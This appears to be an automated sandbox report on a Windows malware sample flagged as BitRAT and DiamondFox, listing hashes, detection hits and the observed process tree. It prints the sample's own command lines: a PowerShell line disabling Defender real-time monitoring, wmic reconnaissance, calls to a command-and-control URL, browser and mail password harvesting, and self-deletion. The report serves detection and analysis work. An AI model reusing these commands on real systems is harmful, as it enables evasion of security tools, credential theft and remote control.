Analysis
-
max time kernel
144s -
max time network
151s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
03-07-2021 23:55
Static task
static1
Behavioral task
behavioral1
Sample
mixazed_20210703-205320.exe
Resource
win7v20210410
General
-
Target
mixazed_20210703-205320.exe
-
Size
1.8MB
-
MD5
8703d31eadccffa270ba764a35dfd548
-
SHA1
6dd74fef8122095da64955abd99f38421629445d
-
SHA256
3ecf2f7b5f8f62572e6006aa6b0ad2c0b7df2bc1fc494f026608c2852113a187
-
SHA512
f8a878ca57208128dd2e9452ede5596aad819f2cab6d80fb71d7ea3baf1e6df540f28c000cbd64ecdd19e9fbb021ab03ea6050bc1f851a9524cf7d22ea4fd6a2
Malware Config
Signatures
-
BitRAT Payload 1 IoCs
resource yara_rule behavioral1/memory/772-71-0x00000000007E2730-mapping.dmp family_bitrat -
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 19 IoCs
Detects DiamondFox payload in file/memory.
resource yara_rule behavioral1/files/0x00030000000130eb-74.dat diamondfox behavioral1/files/0x00030000000130eb-75.dat diamondfox behavioral1/files/0x00030000000130eb-76.dat diamondfox behavioral1/files/0x00030000000130eb-77.dat diamondfox behavioral1/files/0x00030000000130eb-79.dat diamondfox behavioral1/files/0x00030000000130eb-81.dat diamondfox behavioral1/files/0x00030000000130ed-82.dat diamondfox behavioral1/files/0x00030000000130ed-83.dat diamondfox behavioral1/files/0x00030000000130ed-85.dat diamondfox behavioral1/files/0x00030000000130ed-95.dat diamondfox behavioral1/files/0x00030000000130ed-96.dat diamondfox behavioral1/files/0x00030000000130ed-158.dat diamondfox behavioral1/files/0x00030000000130ed-163.dat diamondfox behavioral1/files/0x00030000000130ed-170.dat diamondfox behavioral1/files/0x00030000000130ed-175.dat diamondfox behavioral1/files/0x00030000000130ed-178.dat diamondfox behavioral1/files/0x00030000000130ed-180.dat diamondfox behavioral1/files/0x00030000000130ed-185.dat diamondfox behavioral1/files/0x00030000000130ed-187.dat diamondfox -
NirSoft MailPassView 3 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/1684-173-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView behavioral1/memory/1684-174-0x000000000044412E-mapping.dmp MailPassView behavioral1/memory/1684-176-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/1132-156-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView behavioral1/memory/1132-157-0x00000000004466F4-mapping.dmp WebBrowserPassView behavioral1/memory/1132-160-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView -
Nirsoft 9 IoCs
resource yara_rule behavioral1/memory/1132-156-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral1/memory/1132-157-0x00000000004466F4-mapping.dmp Nirsoft behavioral1/memory/1132-160-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral1/memory/472-169-0x0000000000413E10-mapping.dmp Nirsoft behavioral1/memory/472-168-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral1/memory/472-172-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral1/memory/1684-173-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft behavioral1/memory/1684-174-0x000000000044412E-mapping.dmp Nirsoft behavioral1/memory/1684-176-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 828 sVQTwb6rts5kF2Qe.exe 844 MicrosoftEdgeCPS.exe 1132 MicrosoftEdgeCPS.exe 1276 MicrosoftEdgeCPS.exe 472 MicrosoftEdgeCPS.exe 1684 MicrosoftEdgeCPS.exe 1988 MicrosoftEdgeCPS.exe 1804 MicrosoftEdgeCPS.exe 1948 MicrosoftEdgeCPS.exe 1316 MicrosoftEdgeCPS.exe -
resource yara_rule behavioral1/memory/772-70-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/772-73-0x0000000000400000-0x00000000007E4000-memory.dmp upx -
Loads dropped DLL 7 IoCs
pid Process 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe 828 sVQTwb6rts5kF2Qe.exe 828 sVQTwb6rts5kF2Qe.exe 844 MicrosoftEdgeCPS.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 2004 set thread context of 772 2004 mixazed_20210703-205320.exe 29 PID 844 set thread context of 1132 844 MicrosoftEdgeCPS.exe 53 PID 844 set thread context of 1276 844 MicrosoftEdgeCPS.exe 54 PID 844 set thread context of 472 844 MicrosoftEdgeCPS.exe 55 PID 844 set thread context of 1684 844 MicrosoftEdgeCPS.exe 56 PID 844 set thread context of 1988 844 MicrosoftEdgeCPS.exe 57 PID 844 set thread context of 1804 844 MicrosoftEdgeCPS.exe 60 PID 844 set thread context of 1948 844 MicrosoftEdgeCPS.exe 61 PID 844 set thread context of 1316 844 MicrosoftEdgeCPS.exe 62 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 4 IoCs
pid Process 828 taskkill.exe 1640 taskkill.exe 1360 taskkill.exe 1160 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1716 notepad.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2004 mixazed_20210703-205320.exe 2004 mixazed_20210703-205320.exe 1588 powershell.exe 1188 powershell.exe 1188 powershell.exe 1588 powershell.exe 844 MicrosoftEdgeCPS.exe 1132 MicrosoftEdgeCPS.exe 1132 MicrosoftEdgeCPS.exe 844 MicrosoftEdgeCPS.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2004 mixazed_20210703-205320.exe Token: SeDebugPrivilege 772 mixazed_20210703-205320.exe Token: SeShutdownPrivilege 772 mixazed_20210703-205320.exe Token: SeDebugPrivilege 1588 powershell.exe Token: SeDebugPrivilege 1188 powershell.exe Token: SeIncreaseQuotaPrivilege 332 wmic.exe Token: SeSecurityPrivilege 332 wmic.exe Token: SeTakeOwnershipPrivilege 332 wmic.exe Token: SeLoadDriverPrivilege 332 wmic.exe Token: SeSystemProfilePrivilege 332 wmic.exe Token: SeSystemtimePrivilege 332 wmic.exe Token: SeProfSingleProcessPrivilege 332 wmic.exe Token: SeIncBasePriorityPrivilege 332 wmic.exe Token: SeCreatePagefilePrivilege 332 wmic.exe Token: SeBackupPrivilege 332 wmic.exe Token: SeRestorePrivilege 332 wmic.exe Token: SeShutdownPrivilege 332 wmic.exe Token: SeDebugPrivilege 332 wmic.exe Token: SeSystemEnvironmentPrivilege 332 wmic.exe Token: SeRemoteShutdownPrivilege 332 wmic.exe Token: SeUndockPrivilege 332 wmic.exe Token: SeManageVolumePrivilege 332 wmic.exe Token: 33 332 wmic.exe Token: 34 332 wmic.exe Token: 35 332 wmic.exe Token: SeIncreaseQuotaPrivilege 332 wmic.exe Token: SeSecurityPrivilege 332 wmic.exe Token: SeTakeOwnershipPrivilege 332 wmic.exe Token: SeLoadDriverPrivilege 332 wmic.exe Token: SeSystemProfilePrivilege 332 wmic.exe Token: SeSystemtimePrivilege 332 wmic.exe Token: SeProfSingleProcessPrivilege 332 wmic.exe Token: SeIncBasePriorityPrivilege 332 wmic.exe Token: SeCreatePagefilePrivilege 332 wmic.exe Token: SeBackupPrivilege 332 wmic.exe Token: SeRestorePrivilege 332 wmic.exe Token: SeShutdownPrivilege 332 wmic.exe Token: SeDebugPrivilege 332 wmic.exe Token: SeSystemEnvironmentPrivilege 332 wmic.exe Token: SeRemoteShutdownPrivilege 332 wmic.exe Token: SeUndockPrivilege 332 wmic.exe Token: SeManageVolumePrivilege 332 wmic.exe Token: 33 332 wmic.exe Token: 34 332 wmic.exe Token: 35 332 wmic.exe Token: SeIncreaseQuotaPrivilege 1148 wmic.exe Token: SeSecurityPrivilege 1148 wmic.exe Token: SeTakeOwnershipPrivilege 1148 wmic.exe Token: SeLoadDriverPrivilege 1148 wmic.exe Token: SeSystemProfilePrivilege 1148 wmic.exe Token: SeSystemtimePrivilege 1148 wmic.exe Token: SeProfSingleProcessPrivilege 1148 wmic.exe Token: SeIncBasePriorityPrivilege 1148 wmic.exe Token: SeCreatePagefilePrivilege 1148 wmic.exe Token: SeBackupPrivilege 1148 wmic.exe Token: SeRestorePrivilege 1148 wmic.exe Token: SeShutdownPrivilege 1148 wmic.exe Token: SeDebugPrivilege 1148 wmic.exe Token: SeSystemEnvironmentPrivilege 1148 wmic.exe Token: SeRemoteShutdownPrivilege 1148 wmic.exe Token: SeUndockPrivilege 1148 wmic.exe Token: SeManageVolumePrivilege 1148 wmic.exe Token: 33 1148 wmic.exe Token: 34 1148 wmic.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 772 mixazed_20210703-205320.exe 772 mixazed_20210703-205320.exe 1276 MicrosoftEdgeCPS.exe 1804 MicrosoftEdgeCPS.exe 1948 MicrosoftEdgeCPS.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe 29 PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe 29 PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe 29 PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe 29 PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe 29 PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe 29 PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe 29 PID 2004 wrote to memory of 772 2004 mixazed_20210703-205320.exe 29 PID 772 wrote to memory of 828 772 mixazed_20210703-205320.exe 32 PID 772 wrote to memory of 828 772 mixazed_20210703-205320.exe 32 PID 772 wrote to memory of 828 772 mixazed_20210703-205320.exe 32 PID 772 wrote to memory of 828 772 mixazed_20210703-205320.exe 32 PID 828 wrote to memory of 844 828 sVQTwb6rts5kF2Qe.exe 33 PID 828 wrote to memory of 844 828 sVQTwb6rts5kF2Qe.exe 33 PID 828 wrote to memory of 844 828 sVQTwb6rts5kF2Qe.exe 33 PID 828 wrote to memory of 844 828 sVQTwb6rts5kF2Qe.exe 33 PID 828 wrote to memory of 1588 828 sVQTwb6rts5kF2Qe.exe 34 PID 828 wrote to memory of 1588 828 sVQTwb6rts5kF2Qe.exe 34 PID 828 wrote to memory of 1588 828 sVQTwb6rts5kF2Qe.exe 34 PID 828 wrote to memory of 1588 828 sVQTwb6rts5kF2Qe.exe 34 PID 844 wrote to memory of 1188 844 MicrosoftEdgeCPS.exe 36 PID 844 wrote to memory of 1188 844 MicrosoftEdgeCPS.exe 36 PID 844 wrote to memory of 1188 844 MicrosoftEdgeCPS.exe 36 PID 844 wrote to memory of 1188 844 MicrosoftEdgeCPS.exe 36 PID 844 wrote to memory of 332 844 MicrosoftEdgeCPS.exe 39 PID 844 wrote to memory of 332 844 MicrosoftEdgeCPS.exe 39 PID 844 wrote to memory of 332 844 MicrosoftEdgeCPS.exe 39 PID 844 wrote to memory of 332 844 MicrosoftEdgeCPS.exe 39 PID 844 wrote to memory of 1148 844 MicrosoftEdgeCPS.exe 40 PID 844 wrote to memory of 1148 844 MicrosoftEdgeCPS.exe 40 PID 844 wrote to memory of 1148 844 MicrosoftEdgeCPS.exe 40 PID 844 wrote to memory of 1148 844 MicrosoftEdgeCPS.exe 40 PID 844 wrote to memory of 1684 844 MicrosoftEdgeCPS.exe 43 PID 844 wrote to memory of 1684 844 MicrosoftEdgeCPS.exe 43 PID 844 wrote to memory of 1684 844 MicrosoftEdgeCPS.exe 43 PID 844 wrote to memory of 1684 844 MicrosoftEdgeCPS.exe 43 PID 844 wrote to memory of 1360 844 MicrosoftEdgeCPS.exe 45 PID 844 wrote to memory of 1360 844 MicrosoftEdgeCPS.exe 45 PID 844 wrote to memory of 1360 844 MicrosoftEdgeCPS.exe 45 PID 844 wrote to memory of 1360 844 MicrosoftEdgeCPS.exe 45 PID 844 wrote to memory of 1784 844 MicrosoftEdgeCPS.exe 47 PID 844 wrote to memory of 1784 844 MicrosoftEdgeCPS.exe 47 PID 844 wrote to memory of 1784 844 MicrosoftEdgeCPS.exe 47 PID 844 wrote to memory of 1784 844 MicrosoftEdgeCPS.exe 47 PID 844 wrote to memory of 536 844 MicrosoftEdgeCPS.exe 49 PID 844 wrote to memory of 536 844 MicrosoftEdgeCPS.exe 49 PID 844 wrote to memory of 536 844 MicrosoftEdgeCPS.exe 49 PID 844 wrote to memory of 536 844 MicrosoftEdgeCPS.exe 49 PID 844 wrote to memory of 432 844 MicrosoftEdgeCPS.exe 51 PID 844 wrote to memory of 432 844 MicrosoftEdgeCPS.exe 51 PID 844 wrote to memory of 432 844 MicrosoftEdgeCPS.exe 51 PID 844 wrote to memory of 432 844 MicrosoftEdgeCPS.exe 51 PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe 53 PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe 53 PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe 53 PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe 53 PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe 53 PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe 53 PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe 53 PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe 53 PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe 53 PID 844 wrote to memory of 1132 844 MicrosoftEdgeCPS.exe 53 PID 844 wrote to memory of 1276 844 MicrosoftEdgeCPS.exe 54 PID 844 wrote to memory of 1276 844 MicrosoftEdgeCPS.exe 54
Processes
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe"C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exeC:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe2⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe"C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List5⤵
- Suspicious use of AdjustPrivilegeToken
PID:332
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get caption /FORMAT:List5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get caption /FORMAT:List5⤵PID:1684
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List5⤵PID:1360
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List5⤵PID:1784
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List5⤵PID:536
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List5⤵PID:432
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1132
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1276
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"5⤵
- Executes dropped EXE
PID:472
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"5⤵
- Executes dropped EXE
PID:1684
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
PID:1988 -
C:\Windows\notepad.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe6⤵
- Opens file in notepad (likely ransom note)
PID:1716
-
-
C:\Windows\write.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe6⤵PID:1608
-
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1804
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1948
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
PID:1316
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List5⤵PID:1336
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List5⤵PID:1344
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1988 /F5⤵
- Kills process with taskkill
PID:1640
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1804 /F5⤵
- Kills process with taskkill
PID:1360
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1316 /F5⤵
- Kills process with taskkill
PID:1160
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1948 /F5⤵
- Kills process with taskkill
PID:828
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exe' -Force -Recurse4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
-